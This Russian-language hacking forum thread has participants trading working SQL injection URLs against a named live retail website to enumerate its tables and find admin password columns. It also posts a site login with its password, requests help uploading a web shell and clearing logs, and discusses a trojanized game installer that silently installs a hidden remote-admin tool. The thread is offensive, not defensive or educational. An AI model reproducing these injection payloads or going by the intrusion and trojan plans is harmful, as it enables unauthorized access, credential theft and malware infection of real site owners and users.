переведи свой запрос, у тебя получается вывести названия строк где имя строки char(97 ,100,100,101,100,114,101,113,117,101,115,116,115), а тебе надо вывести названия строк, где имя таблицы char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)
http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1

jokester,спасибо)Опять ступил

http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+information_schema.ta bles+limit+80,1000&q=wNW616thoUBWHv3
Помогите найти админские таблицы, плз, запарился уже...
В Users админа нет...

Помогите найти админские таблицы, плз, запарился уже...
В Users админа нет...
попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+information_schema.co lumns+where+column_name+like+char(37,112,97,115,11 5,37)&q=wNW616thoUBWHv3
запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...

попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+information_schema.co lumns+where+column_name+like+char(37,112,97,115,11 5,37)&q=wNW616thoUBWHv3
запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
Не выходит :(
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?

Всем привет!
Я чайник, даже самовар :) большая просьба ко всем кто в курсе, ответить
Можно ли сделать так, что во время появления на экране окошка с предложением изменения реестра да - нет, запустить программу, которая сама нажмёт кнопку да, как только появиться это окно :) проще говоря, чтобы запись в реестр проходила без запроса у пользователя.
Можно так или нет? Если да то как??

Gemini12,попробуй выведи все таблицы сиптом)может найдешь что-нибудь )

Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!

Не выходит :(
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
попробуй так http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_schema,3,4,5,6,7,8,9,1 0, 11,12,13,14,15,16,17,18+from+information_schema.co l umns+where+table_name=COLLATIONS&q=wNW616thoUBWHv3
table_name=любая стандартная таблица
должна вывести имя бд где находиться стандартная таблица COLLATIONS,
P.s если есть фильтры имя таблицы напиши в hex'e

pinky07,
Ты с ума сошёл? Ты сейчас его только запутаешь...

Gemini12,
Ничего кроме users не нашел, видимо, не судьба.

http://torrent.vstrezhevom.ru/forum/
Логин [TM]*SH@RK
Пасс 123456

Народ помогите пожалуйста залить шелл и скажите плизз как почистить логи!!!! прошу!

Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!

ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
Во :)

ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
Во :)

фаэрвол будет ругаться и антивирус

фаэрвол будет ругаться и антивирус

ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры :) а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать? ;)

Gemini12,
Ничего кроме users не нашел, видимо, не судьба.
Откуда ему взятся
http://www.technodom.kz/admin/

Authorization: Basic

jokester, базовую авторизацию мона и в скрипте реалиховать, не обязательно это настройка апача ;-)

jokester, базовую авторизацию мона и в скрипте реалиховать, не обязательно это настройка апача ;-)
Конечно можно, можно даже эмулировать инъекцию, и выдавать абсолютно левые результаты. Но мы ведь реалисты, верно? :)

ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры :) а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать? ;)
он будет говорить,что это троян!Даже бат он распознает как троя!

Нужен человек,который очень хорошо разбирается в SQL inj ).Нужен,так сказать,консалтинг чтоли,ибо в паблик кидать - спалюсь.Кину в ПМ )

ПМ погомогу :) А лучше в icq найдешь её когда стукнеш в ПМ :)